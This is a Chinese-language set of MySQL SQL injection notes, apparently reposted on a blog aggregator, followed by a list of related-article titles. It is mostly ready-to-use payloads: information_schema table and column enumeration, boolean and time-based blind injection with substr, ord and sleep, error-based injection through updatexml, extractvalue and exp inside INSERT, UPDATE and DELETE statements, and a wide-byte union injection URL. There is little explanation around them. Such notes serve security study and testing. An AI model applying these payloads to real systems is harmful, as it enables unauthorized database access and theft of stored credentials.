MySQL注入笔记
来源:互联网 发布:从程序员到架构师 pdf 编辑:程序博客网 时间:2024/06/11 14:24
MySQL注入笔记
MySQL基础知识
information_schema //MySQL自带数据表table_schema //数据库名table_name //表名column_name //列名select table_name information_schema.tables where table_schema=database(); //跑表名select column_name from information_schema.columns where table_name='admin' //跑列名select password from admin//跑数据
盲注
运用的一些函数
substr(version(),1,1); //截取 第一字节 开始 数的 第一个字节if(1=1,sleep(5),1); 如果1=1 那么sleep(5) 否则输出1ord('a') //acill 97
bool 盲注
形如 ‘=(bool)=’ ,and ‘1’=’1’ , and 1=1
admin'=(select(substr((select(passwd)from(user))from(1)for(1)))=8)='1 //
时间盲注
形如 if(1=1,sleep(5),1)
if(ord((select substr(username,{0},1) from user ))=50,sleep(3) select table_name from information_schema.tables where table_schema=database()select if(ord(substr((select table_name from information_schema.tables where table_schema=database()),0,1))=117,sleep(5),1);select if(ord(substr((select username from user limit 1),1,1))=108,sleep(5),1);
insert update delect注入 引用
http://blog.csdn.net/ysynhtt/article/details/45115849
insert语句
insert into users (id, username, password) values (2,''injecthere'','Olivia');insert into users (id, username, password) values (2,""injecthere"",'Olivia');
payload
or updatexml(1,concat(0x7e,(version())),0) or
insert
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
update
UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or''WHERE id=2 and username='Olivia';
delete
DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';
报错注入(xpath,updatemal,exp)
XPATH注入
0x7e表示的是“~”符号
+and+extractvalue(rand(),concat(0x7e,version()))-- //报错回显版本号
updatexml报错注入
+and+updatexml(0x7e,concat(0x7e,(version())),0)--
exp报错注入
and EXP(~(SELECT * from(select user())a))
宽字节注入
?id=-1%df%27union%20select%201,user(),3--+
0 0
- MySQL注入笔记
- Mysql注入学习笔记(一)
- 【安全牛学习笔记】mysql注入总结
- SQLMAP渗透笔记之MySQL数据库注入
- 【sql注入】mysql注入
- Mysql注入
- mysql注入
- mysql学习笔记(八):防止sql注入
- Mysql注入之一 联合注入
- mysql注入大全
- Php+Mysql注入专题
- mysql注入相关
- php+mysql 注入
- Mysql注入详解
- mysql 注入总结
- php+Mysql注入详解
- php+Mysql注入详解
- PHP mysql防注入
- maven pom.xml解释
- 中华人民共和国行政区划三级联动
- 面试题 类加载的先后顺序?
- 作为一个面试官,我是怎么来面试测试人员的?
- 绑定事件各种方法之间的异同点
- MySQL注入笔记
- 200 行代码实现一个简单的区块链应用
- Spring+quartz 实现定时任务
- 深度学习基础1
- class.newInstance()报NullPointException问题解决
- SecureCRT连接虚拟机中的Linux系统相关
- volley 兼容新版本sdk
- Codeforces 496D Tennis Game【连续二分+枚举】
- margin外边距